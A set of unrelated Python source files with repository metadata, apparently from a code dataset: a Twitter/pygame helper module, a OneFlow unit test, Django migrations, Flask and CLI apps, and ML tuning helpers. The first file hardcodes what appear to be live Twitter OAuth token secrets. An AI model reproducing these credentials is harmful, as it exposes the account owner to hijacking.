OAUTH_TOKEN='794094183841566720-BagrHW91yH8C3Mdh9SOlBfpL6wrSVRW'
OAUTH_TOKEN_SECRET='d0Uucq2dkSHrFHZGLM1X8Hw05d80ajKYGl1zTRxZQSKTm'
applepislcy = Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
### GENERAL ###
def Cleanup():
GPIO.cleanup()
def Sleep(seconds):
"""Puts the program to sleep"""
time.sleep(seconds)
def Alert(channel):
"""Simple alert function for testing event interrupts"""
print('Alert on channel',channel)
def TimeString():
"""Returns the current time"""
t = time.localtime()
return str(t[0])+'.'+str(t[1])+'.'+str(t[2])+'.'+str(t[3])+'.'+str(t[4])+'.'+str(t[5])
def LoadPins(mapping,inp):
"""Organizes an input into a pin mapping dict
mapping <list>, ['IA','IB']
inp <dict>, <list>, <int> {'IA':1,'IB':2}, [1,2]
"""
if type(inp) is int and len(mapping) == 1:
return {mapping[0]:inp}
elif type(inp) is list and len(mapping) == len(inp):
o = {}
for i in range(len(inp)):
o[mapping[i]] = inp[i]
return o
elif type(inp) is dict:
return inp
else:
print('Invalid input for pins:',inp,type(inp))
print('Expected:',mapping)
return {}
def BoolToSign(inp):
"""Converts boolean bits into signed bits
0 -> -1
1 -> 1"""
return (inp * 2) - 1
def SignToBool(inp):
"""Converts signed bits into boolean bits
-1 -> 0
1 -> 1"""
return (inp + 1) / 2
### PYGAME ###
def WindowSetup(size=(300,50),caption='',text='',background=(0,0,0),foreground=(255,255,255)):
"""Sets up a pygame window to take keyboard input
size <tuple>, width by height
caption <str>, window title bar
text <str>, text to display in window, accepts \n
background <tuple>, foreground <tuple>, (r,g,b) color
"""
pygame.init()
screen = pygame.display.set_mode(size,0,32)
pygame.display.set_caption(caption)
myfont = pygame.font.SysFont('Monospace',15)
labels = []
lines = text.split('\n')
for line in lines:
labels.append(myfont.render(line,1,foreground))
screen.fill(background)
y = 0
for label in labels:
screen.blit(label, (0,y))
y += 15
pygame.display.update()
def InputLoop(eventmap):
"""Begins a pygame loop, mapping key inputs to functions
eventmap <dict>, {pygame.K_t:myfunction}
"""
index = 0
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.KEYDOWN:
#print("{0}: You pressed {1:c}".format ( index , event.key ))
if event.key in eventmap:
eventmap[event.key]()
elif event.type == pygame.QUIT:
pygame.quit()
sys.exit()
def InputLoopDemo():
def dog():
print('woof')
def cat():
print('meow')
def fish():
print('blub')
WindowSetup(caption='pet simulator',text='d for dog\nc for cat\nf for fish')
InputLoop({pygame.K_d:dog, pygame.K_c:cat, pygame.K_f:fish})
### TWITTER ###
def Tweet(twit,statustext):
"""Tweets a message
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
statustext <str>, must be <= 140 characters
"""
if len(statustext) > 140:
print('ERROR: Character limit 140 exceeded:',len(statustext))
else:
twit.update_status(status=statustext)
def TweetPicture(twit,file,statustext):
"""Tweets a message with a picture
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
file <str>, path and filename to picture
statustext <str>, must be <= 140 characters
"""
photo = open(file, 'rb')
response = twitter.upload_media(media=photo)
twit.update_status(status=statustext, media_ids=[response['media_id']])
def TweetVideo(twit,file,statustext):
"""Tweets a message with a video
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
file <str>, path and filename to video
statustext <str>, must be <= 140 characters
"""
video = open(file, 'rb')
response = twitter.upload_video(media=video, media_type='video/mp4')
twit.update_status(status=statustext, media_ids=[response['media_id']])
| 30.883562 | 94 | 0.635174 |
71ad91d94d2021895fed2197ad1e1027179c068d
| 5,844 |
py
|
Python
|
oneflow/python/test/ops/test_object_bbox_scale.py
|
caishenghang/oneflow
|
db239cc9f98e551823bf6ce2d4395bd5c339b1c5
|
[
"Apache-2.0"
] | 2 |
2021-09-10T00:19:49.000Z
|
2021-11-16T11:27:20.000Z
|
oneflow/python/test/ops/test_object_bbox_scale.py
|
duijiudanggecl/oneflow
|
d2096ae14cf847509394a3b717021e2bd1d72f62
|
[
"Apache-2.0"
] | null | null | null |
oneflow/python/test/ops/test_object_bbox_scale.py
|
duijiudanggecl/oneflow
|
d2096ae14cf847509394a3b717021e2bd1d72f62
|
[
"Apache-2.0"
] | 1 |
2021-11-10T07:57:01.000Z
|
2021-11-10T07:57:01.000Z
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import os
import random
import cv2
import numpy as np
import oneflow as flow
import oneflow.typing as oft
def _random_sample_images(anno_file, image_dir, batch_size):
from pycocotools.coco import COCO
image_files = []
image_ids = []
batch_group_id = -1
coco = COCO(anno_file)
img_ids = coco.getImgIds()
while len(image_files) < batch_size:
rand_img_id = random.choice(img_ids)
img_h = coco.imgs[rand_img_id]["height"]
img_w = coco.imgs[rand_img_id]["width"]
group_id = int(img_h / img_w)
if batch_group_id == -1:
batch_group_id = group_id
if group_id != batch_group_id:
continue
anno_ids = coco.getAnnIds(imgIds=[rand_img_id])
if len(anno_ids) == 0:
continue
image_files.append(os.path.join(image_dir, coco.imgs[rand_img_id]["file_name"]))
image_ids.append(rand_img_id)
assert len(image_files) == len(image_ids)
images = [cv2.imread(image_file).astype(np.single) for image_file in image_files]
bbox_list = _get_images_bbox_list(coco, image_ids)
return images, bbox_list
def _get_images_bbox_list(coco, image_ids):
bbox_list = []
for img_id in image_ids:
anno_ids = coco.getAnnIds(imgIds=[img_id])
anno_ids = list(
filter(lambda anno_id: coco.anns[anno_id]["iscrowd"] == 0, anno_ids)
)
bbox_array = np.array(
[coco.anns[anno_id]["bbox"] for anno_id in anno_ids], dtype=np.single
)
bbox_list.append(bbox_array)
return bbox_list
def _get_images_static_shape(images):
image_shapes = [image.shape for image in images]
image_static_shape = np.amax(image_shapes, axis=0)
assert isinstance(
image_static_shape, np.ndarray
), "image_shapes: {}, image_static_shape: {}".format(
str(image_shapes), str(image_static_shape)
)
image_static_shape = image_static_shape.tolist()
image_static_shape.insert(0, len(image_shapes))
return image_static_shape
def _get_bbox_static_shape(bbox_list):
bbox_shapes = [bbox.shape for bbox in bbox_list]
bbox_static_shape = np.amax(bbox_shapes, axis=0)
assert isinstance(
bbox_static_shape, np.ndarray
), "bbox_shapes: {}, bbox_static_shape: {}".format(
str(bbox_shapes), str(bbox_static_shape)
)
bbox_static_shape = bbox_static_shape.tolist()
bbox_static_shape.insert(0, len(bbox_list))
return bbox_static_shape
def _of_target_resize_bbox_scale(images, bbox_list, target_size, max_size):
image_shape = _get_images_static_shape(images)
bbox_shape = _get_bbox_static_shape(bbox_list)
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
func_config.default_logical_view(flow.scope.mirrored_view())
@flow.global_function(function_config=func_config)
def target_resize_bbox_scale_job(
image_def: oft.ListListNumpy.Placeholder(
shape=tuple(image_shape), dtype=flow.float
),
bbox_def: oft.ListListNumpy.Placeholder(
shape=tuple(bbox_shape), dtype=flow.float
),
):
images_buffer = flow.tensor_list_to_tensor_buffer(image_def)
resized_images_buffer, new_size, scale = flow.image_target_resize(
images_buffer, target_size=target_size, max_size=max_size
)
bbox_buffer = flow.tensor_list_to_tensor_buffer(bbox_def)
scaled_bbox = flow.object_bbox_scale(bbox_buffer, scale)
scaled_bbox_list = flow.tensor_buffer_to_tensor_list(
scaled_bbox, shape=bbox_shape[1:], dtype=flow.float
)
return scaled_bbox_list, new_size
input_image_list = [np.expand_dims(image, axis=0) for image in images]
input_bbox_list = [np.expand_dims(bbox, axis=0) for bbox in bbox_list]
output_bbox_list, output_image_size = target_resize_bbox_scale_job(
[input_image_list], [input_bbox_list]
).get()
return output_bbox_list.numpy_lists()[0], output_image_size.numpy_list()[0]
def _compare_bbox_scale(
test_case,
anno_file,
image_dir,
batch_size,
target_size,
max_size,
print_debug_info=False,
):
images, bbox_list = _random_sample_images(anno_file, image_dir, batch_size)
of_bbox_list, image_size_list = _of_target_resize_bbox_scale(
images, bbox_list, target_size, max_size
)
for image, bbox, of_bbox, image_size in zip(
images, bbox_list, of_bbox_list, image_size_list
):
w, h = image_size
oh, ow = image.shape[0:2]
scale_h = h / oh
scale_w = w / ow
bbox[:, 0] *= scale_w
bbox[:, 1] *= scale_h
bbox[:, 2] *= scale_w
bbox[:, 3] *= scale_h
test_case.assertTrue(np.allclose(bbox, of_bbox))
@flow.unittest.skip_unless_1n1d()
class TestObjectBboxScale(flow.unittest.TestCase):
def test_object_bbox_scale(test_case):
_compare_bbox_scale(
test_case,
"/dataset/mscoco_2017/annotations/instances_val2017.json",
"/dataset/mscoco_2017/val2017",
4,
800,
1333,
)
if __name__ == "__main__":
unittest.main()
| 32.287293 | 88 | 0.688912 |
1ce550dcd34ad1e54a6bb3af57029219d257f4d1
| 742 |
py
|
Python
|
source/blog/migrations/0004_postcomments.py
|
JakubGutowski/PersonalBlog
|
96122b36486f7e874c013e50d939732a43db309f
|
[
"BSD-3-Clause"
] | null | null | null |
source/blog/migrations/0004_postcomments.py
|
JakubGutowski/PersonalBlog
|
96122b36486f7e874c013e50d939732a43db309f
|
[
"BSD-3-Clause"
] | null | null | null |
source/blog/migrations/0004_postcomments.py
|
JakubGutowski/PersonalBlog
|
96122b36486f7e874c013e50d939732a43db309f
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 2.0.5 on 2018-07-02 19:46
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_blogpost_author'),
]
operations = [
migrations.CreateModel(
name='PostComments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nick', models.CharField(max_length=20)),
('comment', models.CharField(max_length=140)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.BlogPost')),
],
),
]
| 30.916667 | 115 | 0.58221 |
1cecb4c2f3b6f24c919644faa0e058b12f679c06
| 273 |
py
|
Python
|
src/flocker/blueprints/red/__init__.py
|
Muxelmann/home-projects
|
85bd06873174b9c5c6276160988c19b460370db8
|
[
"MIT"
] | null | null | null |
src/flocker/blueprints/red/__init__.py
|
Muxelmann/home-projects
|
85bd06873174b9c5c6276160988c19b460370db8
|
[
"MIT"
] | null | null | null |
src/flocker/blueprints/red/__init__.py
|
Muxelmann/home-projects
|
85bd06873174b9c5c6276160988c19b460370db8
|
[
"MIT"
] | null | null | null |
import os
from flask import Blueprint, render_template
def create_bp():
bp_red = Blueprint('red', __name__, url_prefix='/red')
@bp_red.route('/index/')
@bp_red.route('/')
def index():
return render_template('red/index.html')
return bp_red
| 22.75 | 58 | 0.652015 |
1c073d575249e6f524c3e4fa1ac84edb0ff05cc7
| 984 |
py
|
Python
|
UAS/UAS 11 & 12/main.py
|
Archedar/UAS
|
3237d9304026340acc93c8f36b358578dc0ae66f
|
[
"BSD-Source-Code"
] | null | null | null |
UAS/UAS 11 & 12/main.py
|
Archedar/UAS
|
3237d9304026340acc93c8f36b358578dc0ae66f
|
[
"BSD-Source-Code"
] | null | null | null |
UAS/UAS 11 & 12/main.py
|
Archedar/UAS
|
3237d9304026340acc93c8f36b358578dc0ae66f
|
[
"BSD-Source-Code"
] | null | null | null |
#Main Program
from Class import Barang
import Menu
histori = list()
listBarang = [
Barang('Rinso', 5000, 20),
Barang('Sabun', 3000, 20),
Barang('Pulpen', 2500, 20),
Barang('Tisu', 10000, 20),
Barang('Penggaris', 1000, 20)
]
while True:
print('''
Menu
1. Tampilkan Barang
2. Tambahkan Barang
3. Tambah Stock Barang
4. Hapus Barang
5. Cari Barang Berdasarkan Keyword
6. Hitung Barang Belanjaan
7. Histori Keluar Masuk Barang
0. Keluar Program
''')
choice = input('Masukan No Menu: ')
if choice == '1':
Menu.menu1(listBarang)
elif choice == '2':
Menu.menu2(listBarang, histori)
elif choice == '3':
Menu.menu3(listBarang, histori)
elif choice == '4':
Menu.menu4(listBarang, histori)
elif choice == '5':
Menu.menu5(listBarang)
elif choice == '6':
Menu.menu6(listBarang, histori)
elif choice == '7':
Menu.menu7(histori)
elif choice == '0':
print('Keluar Program')
break
else:
print('Invalid Input!')
| 20.93617 | 37 | 0.645325 |
98d7520f9994f6836e73faaf42f63009eee0dc64
| 697 |
py
|
Python
|
project/cli/event.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 1 |
2021-06-01T14:49:18.000Z
|
2021-06-01T14:49:18.000Z
|
project/cli/event.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 286 |
2020-12-04T14:13:00.000Z
|
2022-03-09T19:05:16.000Z
|
project/cli/event.py
|
DanielGrams/gsevpt
|
a92f71694388e227e65ed1b24446246ee688d00e
|
[
"MIT"
] | null | null | null |
import click
from flask.cli import AppGroup
from project import app, db
from project.dateutils import berlin_tz
from project.services.event import (
get_recurring_events,
update_event_dates_with_recurrence_rule,
)
event_cli = AppGroup("event")
@event_cli.command("update-recurring-dates")
def update_recurring_dates():
# Setting the timezone is neccessary for cli command
db.session.execute("SET timezone TO :val;", {"val": berlin_tz.zone})
events = get_recurring_events()
for event in events:
update_event_dates_with_recurrence_rule(event)
db.session.commit()
click.echo(f"{len(events)} event(s) were updated.")
app.cli.add_command(event_cli)
| 24.034483 | 72 | 0.746055 |
908cafca02ccd9dbc79045504cbba8cbd1494065
| 12,221 |
py
|
Python
|
src/onegov/translator_directory/layout.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/translator_directory/layout.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/translator_directory/layout.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from cached_property import cached_property
from purl import URL
from onegov.translator_directory import _
from onegov.core.elements import Block, Link, LinkGroup, Confirm, Intercooler
from onegov.core.utils import linkify
from onegov.org.layout import DefaultLayout as BaseLayout
from onegov.translator_directory.collections.documents import \
TranslatorDocumentCollection
from onegov.translator_directory.collections.language import LanguageCollection
from onegov.translator_directory.collections.translator import \
TranslatorCollection
from onegov.translator_directory.constants import member_can_see, \
editor_can_see, GENDERS, ADMISSIONS, PROFESSIONAL_GUILDS, \
INTERPRETING_TYPES
class DefaultLayout(BaseLayout):
@staticmethod
def linkify(text):
return linkify(text)
@staticmethod
def format_languages(languages):
return ', '.join(sorted((lang.name for lang in languages or [])))
def format_gender(self, gender):
return self.request.translate(GENDERS[gender])
@staticmethod
def format_drive_distance(number):
if not number:
return ''
return f'{number} km'
def format_boolean(self, val):
assert isinstance(val, bool)
return self.request.translate((_('Yes') if val else _('No')))
def format_admission(self, val):
return self.request.translate(ADMISSIONS[val])
def show(self, attribute_name):
"""Some attributes on the translator are hidden for less privileged
users"""
if self.request.is_member:
return attribute_name in member_can_see
if self.request.is_editor:
return attribute_name in editor_can_see
return True
def color_class(self, count):
""" Depending how rare a language is offered by translators,
apply a color code using the returned css class
"""
if count <= 5:
return 'text-orange'
def format_prof_guild(self, key):
return self.request.translate(PROFESSIONAL_GUILDS[key])
def format_interpreting_type(self, key):
return self.request.translate(INTERPRETING_TYPES[key])
class TranslatorLayout(DefaultLayout):
@cached_property
def file_collection(self):
return TranslatorDocumentCollection(
self.request.session,
translator_id=self.model.id,
category=None
)
@cached_property
def editbar_links(self):
if self.request.is_admin:
return [
LinkGroup(
title=_('Add'),
links=(
Link(
text=_("Add translator"),
url=self.request.class_link(
TranslatorCollection, name='new'
),
attrs={'class': 'new-person'}
),
)
),
Link(
text=_("Edit"),
url=self.request.link(
self.model, name='edit'
),
attrs={'class': 'edit-link'}
),
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Confirm(
_("Do you really want to delete "
"this translator?"),
_("This cannot be undone."),
_("Delete translator"),
_("Cancel")
),
Intercooler(
request_method='DELETE',
redirect_after=self.request.class_link(
TranslatorCollection
)
)
)
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
),
Link(
_('Documents'),
self.request.link(self.file_collection),
attrs={'class': 'documents'}
),
]
elif self.request.is_editor:
return [
Link(
text=_("Edit"),
url=self.request.link(
self.model, name='edit-restricted'
),
attrs={'class': 'edit-link'}
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
),
]
elif self.request.is_member:
return [
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
),
Link(text=self.model.title)
]
return links
class EditTranslatorLayout(TranslatorLayout):
@cached_property
def title(self):
return _('Edit translator')
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Edit')))
return links
class TranslatorCollectionLayout(DefaultLayout):
@cached_property
def title(self):
return _('Search for translators')
@cached_property
def breadcrumbs(self):
return super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
)
]
@cached_property
def editbar_links(self):
if self.request.is_admin:
return [
LinkGroup(
_('Add'),
links=(
Link(
text=_("Add translator"),
url=self.request.class_link(
TranslatorCollection, name='new'
),
attrs={'class': 'new-person'}
),
Link(
text=_("Add language"),
url=self.request.class_link(
LanguageCollection, name='new'
),
attrs={'class': 'new-language'}
)
)
),
Link(
_('Export Excel'),
url=self.request.class_link(
TranslatorCollection, name='export'
),
attrs={'class': 'export-link'}
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
elif self.request.is_editor or self.request.is_member:
return [
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
class AddTranslatorLayout(TranslatorCollectionLayout):
@cached_property
def title(self):
return _('Add translator')
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Add')))
return links
@property
def editbar_links(self):
return []
class TranslatorDocumentsLayout(DefaultLayout):
@cached_property
def breadcrumbs(self):
return super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
),
Link(
text=self.model.translator.title,
url=self.request.link(self.model.translator)
),
Link(text=_('Documents'))
]
@cached_property
def upload_url(self):
url = URL(self.request.link(self.model, name='upload'))
url = url.query_param('category', self.model.category)
return self.csrf_protected_url(url.as_string())
def link_for(self, category):
return self.request.class_link(
self.model.__class__,
{'translator_id': self.model.translator_id, 'category': category}
)
class LanguageCollectionLayout(DefaultLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Languages')))
return links
@property
def editbar_links(self):
return [LinkGroup(
_('Add'),
links=(
Link(
text=_("Add language"),
url=self.request.class_link(
LanguageCollection, name='new'
),
attrs={'class': 'new-language'}
),
)
)] if self.request.is_admin else []
class LanguageLayout(DefaultLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(
Link(_('Languages'),
url=self.request.class_link(LanguageCollection))
)
return links
class EditLanguageLayout(LanguageLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(self.model.name))
links.append(Link(_('Edit')))
return links
@cached_property
def editbar_links(self):
if self.request.is_admin:
if not self.model.deletable:
return [
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Block(
_("This language is used and can't be "
"deleted."),
no=_("Cancel")
),
)
),
]
return [
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Confirm(
_("Do you really want to delete "
"this language?"),
_("This cannot be undone."),
_("Delete language"),
_("Cancel")
),
Intercooler(
request_method='DELETE',
redirect_after=self.request.class_link(
TranslatorCollection
)
)
)
),
]
return []
class AddLanguageLayout(LanguageLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Add')))
return links
@property
def editbar_links(self):
return []
| 31.17602 | 79 | 0.469274 |
90b9ca60618e207e4f11df9555b71806b45d69af
| 1,538 |
py
|
Python
|
src/classifier/classifier_tuning/tune_sklearn.py
|
krangelie/bias-in-german-nlg
|
9fbaf50fde7d41d64692ae90c41beae61bc78d44
|
[
"MIT"
] | 14 |
2021-08-24T12:36:37.000Z
|
2022-03-18T12:14:36.000Z
|
src/classifier/classifier_tuning/tune_sklearn.py
|
krangelie/bias-in-german-nlg
|
9fbaf50fde7d41d64692ae90c41beae61bc78d44
|
[
"MIT"
] | null | null | null |
src/classifier/classifier_tuning/tune_sklearn.py
|
krangelie/bias-in-german-nlg
|
9fbaf50fde7d41d64692ae90c41beae61bc78d44
|
[
"MIT"
] | 1 |
2021-10-21T20:22:55.000Z
|
2021-10-21T20:22:55.000Z
|
from sklearn.ensemble import RandomForestClassifier
import xgboost
def suggest_xgb(model_params, trial, xgb=None):
n_estimators = trial.suggest_int(
model_params.n_estimators.name,
model_params.n_estimators.lower,
model_params.n_estimators.upper,
model_params.n_estimators.step,
)
lr = trial.suggest_float(
model_params.learning_rate.name,
model_params.learning_rate.lower,
model_params.learning_rate.upper,
log=True,
)
max_depth = trial.suggest_int(
model_params.max_depth.name,
model_params.max_depth.lower,
model_params.max_depth.upper,
model_params.max_depth.step,
)
classifier = xgboost.XGBClassifier(
n_estimators=n_estimators,
learning_rate=lr,
max_depth=max_depth,
random_state=42,
use_label_encoder=False,
tree_method="gpu_hist",
gpu_id=0,
)
return classifier
def suggest_rf(model_params, trial):
n_estimators = trial.suggest_int(
model_params.n_estimators.name,
model_params.n_estimators.lower,
model_params.n_estimators.upper,
model_params.n_estimators.step,
)
max_depth = trial.suggest_int(
model_params.max_depth.name,
model_params.max_depth.lower,
model_params.max_depth.upper,
model_params.max_depth.step,
)
classifier = RandomForestClassifier(
n_estimators=n_estimators, max_depth=max_depth, random_state=42
)
return classifier
| 27.963636 | 71 | 0.683355 |
292abc115693fa0811cb421e9f5c9743d0e6e3a6
| 7,521 |
py
|
Python
|
year_3/databases_sem1/lab1/cli.py
|
honchardev/KPI
|
f8425681857c02a67127ffb05c0af0563a8473e1
|
[
"MIT"
] | null | null | null |
year_3/databases_sem1/lab1/cli.py
|
honchardev/KPI
|
f8425681857c02a67127ffb05c0af0563a8473e1
|
[
"MIT"
] | 21 |
2020-03-24T16:26:04.000Z
|
2022-02-18T15:56:16.000Z
|
year_3/databases_sem1/lab1/cli.py
|
honchardev/KPI
|
f8425681857c02a67127ffb05c0af0563a8473e1
|
[
"MIT"
] | null | null | null |
from maxdb import DB
def runtime_on_any_exception(func):
def decorate(*args, **kwargs):
try:
func(*args, **kwargs)
except:
raise RuntimeError
return decorate
class CLIUtils(object):
DEFAULT_PATH = 'storage.json'
def __init__(self):
self._db = None
self._path = self.DEFAULT_PATH
def run(self, rawcmd):
cmd, *args = rawcmd.split(' ')
if cmd:
try:
self._cmds_cache[cmd](args)
except KeyError:
print('Lab1 does not have command <{0}>'.format(cmd))
except RuntimeError:
print('Incorrect arguments for DB.{0}: <{1}>'.format(cmd, args))
@property
def _cmds_cache(self):
return {
'tables': self._tables,
'all': self._all,
'insert': self._insert,
'get': self._get,
'update': self._update,
'delete': self._delete,
'help': lambda _: print(self._help_msg),
'path': lambda _: print(self._path),
'exit': self._close,
}
@property
def _help_msg(self):
return """LAB1 HELP:
| tables
| print list of tables from current storage.
| all <table> (<table> ...)
| display _all values from specific table.
| all labcondition
| display _all products with price more than 100UAH.
| insert <table> <cnt>
| insert N items to the table.
| is followed by >>>column_name <value>
| get <table> <id>
| get single row specified by id from table.
| update <table> <id>
| udpate table with a new single value.
| is followed by
| >>>with <column> <value> (<column> <value> (...))
| delete <table> <id>
| delete row specified by id from table.
| save <filepath>
| save database using current storage type to specified filepath.
| load <filepath>
| load specific database from file using current storage type.
| help
| display current message.
| path
| display storage file path.
| exit
| exit the program.
"""
def _tables(self, _):
print(self._db.tables())
@runtime_on_any_exception
def _all(self, args):
if 'labcondition' == args[0]:
found_rows = self._db.get(
'Products',
column='price',
cond=lambda p: int(p.value) > 100
)
print('Rows from DB.Products with price>100:')
print('\n'.join(map(str, found_rows)))
else:
for table_name in args:
table_rows = self._db.table(table_name).all_ids()
table_pretty_rows = '\n'.join(map(lambda i: 'ID {0} {1}'.format(*i), table_rows))
print('DB.{0}:\n{1}'.format(table_name, table_pretty_rows))
@runtime_on_any_exception
def _insert(self, args):
table_name, cnt = args
table_to_insert = self._db.table(table_name)
for cur_cnt in range(int(cnt)):
print('Please, enter values for DB.{0} row:'.format(table_name))
row_to_insert = {}
for column_name, column_type in table_to_insert.columns.items():
if column_type == 'fk':
print('Enter Table for FK: fktable=', end='')
fktable = input()
print('Enter Id for FK: fkid=', end='')
fkid = input()
row_to_insert[column_name] = (
{'table': fktable, 'fkid': fkid},
column_type
)
else:
print('Enter {0}, type={1}: {0}='.format(column_name, column_type), end='')
column_value = input()
row_to_insert[column_name] = (column_value, column_type)
table_to_insert.insert(row_to_insert)
@runtime_on_any_exception
def _get(self, args):
table_name, row_idx = args
print('DB.{0} id={1}:'.format(*args))
print(self._db.get(table_name, doc_id=int(row_idx)) or 'Not Found DB.{0}.{1}'.format(*args))
@runtime_on_any_exception
def _update(self, args):
table_name, row_idx = args
table_to_update = self._db.table(table_name)
row_to_update = table_to_update.get(row_id=int(row_idx))
colval_to_update = {}
print('Updating DB.{0}.{1}: {2}'.format(table_name, row_idx, row_to_update))
for column_name, column_type in table_to_update.columns.items():
if column_type == 'fk':
current_fktable = row_to_update[column_name].table
print('Change FKTable from <{0}> to value='.format(current_fktable), end='')
after_fktable = input()
current_fkid = row_to_update[column_name].fk_id
print('Change FKId from <{0}> to value='.format(current_fkid), end='')
after_fkid = input()
colval_to_update[column_name] = {
'table': after_fktable,
'fkid': after_fkid
}
else:
print('Enter value for column {0}, type={1}: {0}='.format(column_name, column_type), end='')
column_value = input()
colval_to_update[column_name] = column_value
table_to_update.update(colval_to_update, [int(row_idx)])
@runtime_on_any_exception
def _delete(self, args):
table_name, row_id = args
print('Deleted item DB.{0}.{1}'.format(*args))
print(self._db.delete(table_name, row_ids=[int(row_id)]) or 'Not Found DB.{0}.{1}'.format(*args))
def _open(self):
"""Create DB instance and preload default models."""
self._db = DB(self._path)
products = self._db.table(
'Products',
columns={'name': 'str', 'price': 'int'}
)
orders = self._db.table(
'Orders',
columns={'product': 'fk', 'client': 'str', 'destination': 'addr'}
)
try:
products.insert_multiple([
{"name": ("product1", "str"), "price": ("50", "int")},
{"name": ("product2", "str"), "price": ("100", "int")},
{"name": ("product3", "str"), "price": ("200", "int")},
])
except:
pass
try:
orders.insert_multiple([
{
"product": ({'table': 'Products', 'fkid': '1'}, 'fk'),
"client": ("honchar", "str"), "destination": ("Kyiv", "addr")
},
{
"product": ({'table': 'Products', 'fkid': '2'}, 'fk'),
"client": ("honchar2", "str"), "destination": ("Kyiv2", "addr")
},
{
"product": ({'table': 'Products', 'fkid': '3'}, 'fk'),
"client": ("honchar3", "str"), "destination": ("Kyiv3", "addr")
},
])
except:
pass
self.run('help', *())
def _close(self, _):
"""Close DB instance routine."""
self._db.close()
def __enter__(self):
self._open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close(None)
| 37.049261 | 108 | 0.505252 |
46950a30a497c84732798b48f44483d04a01233a
| 217 |
py
|
Python
|
top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | 1 |
2020-01-16T09:23:43.000Z
|
2020-01-16T09:23:43.000Z
|
top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | null | null | null |
top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | null | null | null |
import requests
keyword = "python"
try:
kv = {'q':keyword}
r = requests.get('http://www.so.com/s', params=kv)
print(r.request.url)
r.raise_for_status()
print(len(r.text))
except:
print('爬取失败')
| 19.727273 | 54 | 0.617512 |
3172a2c22ec1638c70e59d5c5b2388f4aa10d1ba
| 788 |
py
|
Python
|
backend/songwriter/migrations/0006_auto_20170902_0723.py
|
giliam/turbo-songwriter
|
3d100b08dc19c60d7a1324120e06bd9f971eea5a
|
[
"MIT"
] | null | null | null |
backend/songwriter/migrations/0006_auto_20170902_0723.py
|
giliam/turbo-songwriter
|
3d100b08dc19c60d7a1324120e06bd9f971eea5a
|
[
"MIT"
] | 12 |
2017-09-25T20:13:29.000Z
|
2020-02-12T00:12:41.000Z
|
backend/songwriter/migrations/0006_auto_20170902_0723.py
|
giliam/turbo-songwriter
|
3d100b08dc19c60d7a1324120e06bd9f971eea5a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
